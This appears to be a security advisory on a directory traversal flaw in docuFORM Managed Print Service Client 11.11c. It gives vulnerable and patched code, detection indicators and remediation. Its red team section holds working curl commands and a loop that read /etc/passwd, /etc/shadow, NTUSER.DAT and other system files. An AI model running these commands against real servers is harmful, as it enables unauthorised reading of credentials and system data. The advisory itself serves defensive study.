The vulnerability is easily exploitable remotely without authentication, making it a high-priority threat for organizations using docuFORM MPS.

Deep Dive & Mechanics

The directory traversal vulnerability exists in the web interface of docuFORM Managed Print Service Client 11.11c. The application fails to properly sanitize user-supplied input in URL parameters, allowing an attacker to use ../ sequences to navigate outside the intended web root directory. By crafting a URL such as http://target:port/../../../etc/passwd, the attacker can read arbitrary files on the server.

The root cause is insufficient input validation in the file retrieval handler. The application likely uses a function that concatenates user input with a base path without checking for path traversal sequences. This allows the attacker to break out of the restricted directory and access sensitive system files.

Vulnerable vs. Patched Code

Since no patch is available, the vulnerable code is the production version 11.11c. The following is a conceptual example of the vulnerable code pattern:

# Vulnerable code (conceptual)
def get_file(filename):
    base_path = "/var/www/docuform/files/"
    full_path = base_path + filename
    with open(full_path, 'r') as f:
        return f.read()

A patched version would include input validation:

# Patched code (conceptual)
import os

def get_file(filename):
    base_path = "/var/www/docuform/files/"
    # Sanitize input
    safe_filename = os.path.basename(filename)
    full_path = os.path.join(base_path, safe_filename)
    # Ensure the resolved path is within base_path
    real_path = os.path.realpath(full_path)
    if not real_path.startswith(os.path.realpath(base_path)):
        raise Exception("Invalid path")
    with open(real_path, 'r') as f:
        return f.read()

Exploitation & Lab Setup

Red Team

Lab Setup:

  1. Install docuFORM Managed Print Service Client 11.11c on a Windows or Linux VM.
  2. Ensure the web interface is accessible on port 80 or 443.
  3. Create a test file (e.g., C:\test\secret.txt or /tmp/secret.txt) with sensitive content.

Exploitation Steps:

  1. Identify the target's IP and port (e.g., 192.168.1.100:8080).
  2. Use curl or a browser to test directory traversal:
    curl "http://192.168.1.100:8080/../../../etc/passwd"

    On Windows:
    curl "http://192.168.1.100:8080/../../../Windows/System32/drivers/etc/hosts"

  3. If successful, the file content will be returned. For Windows, try:
    curl "http://192.168.1.100:8080/../../../Users/Administrator/NTUSER.DAT"

  4. Automate with a script to enumerate common files:
    for file in /etc/passwd /etc/shadow /etc/hosts /etc/issue; do
        curl -s "http://192.168.1.100:8080/../../../$file"
    done

Blue Team

Detection:

  • Monitor web server logs for URL patterns containing ../ or %2e%2e%2f.
  • Alert on requests to sensitive files like /etc/passwd, /etc/shadow, or boot.ini.
  • Use the detection rules provided below.

Mitigation:

  • If possible, apply a virtual patch using a WAF (e.g., ModSecurity) to block directory traversal patterns.
  • Restrict file system permissions to limit the impact of successful exploitation.
  • Isolate the docuFORM service in a container or sandbox.

Indicators of Compromise (IOCs)

  • Network IOCs:

    • HTTP requests containing ../ or URL-encoded variants (%2e%2e%2f, %252e%252e%252f).
    • Requests to paths like /../../../etc/passwd, /../../../Windows/System32/drivers/etc/hosts.
    • Unusual outbound data transfers from the docuFORM server.
  • File System IOCs:

    • Unexpected access to system files (e.g., /etc/shadow, C:\Windows\System32\config\SAM).
    • Presence of temporary files created by exploitation scripts.
  • Log IOCs:

    • Web server logs showing multiple 404 or 200 responses for traversal patterns.
    • Error logs indicating file read failures for paths outside the web root.

Remediation & Mitigation

  • Immediate Actions:

    • Disable or restrict access to the docuFORM web interface if not required.
    • Implement a Web Application Firewall (WAF) rule to block directory traversal patterns.
    • Monitor logs for exploitation attempts.
  • Long-term Fix:

    • Contact docuFORM for an official patch or upgrade to a non-vulnerable version.
    • If no patch is available, consider replacing the software with an alternative.
  • Compensating Controls:

    • Run the service with minimal privileges (e.g., a dedicated low-privilege user).
    • Use file system permissions to restrict read access to sensitive files.
    • Deploy network segmentation to limit exposure.
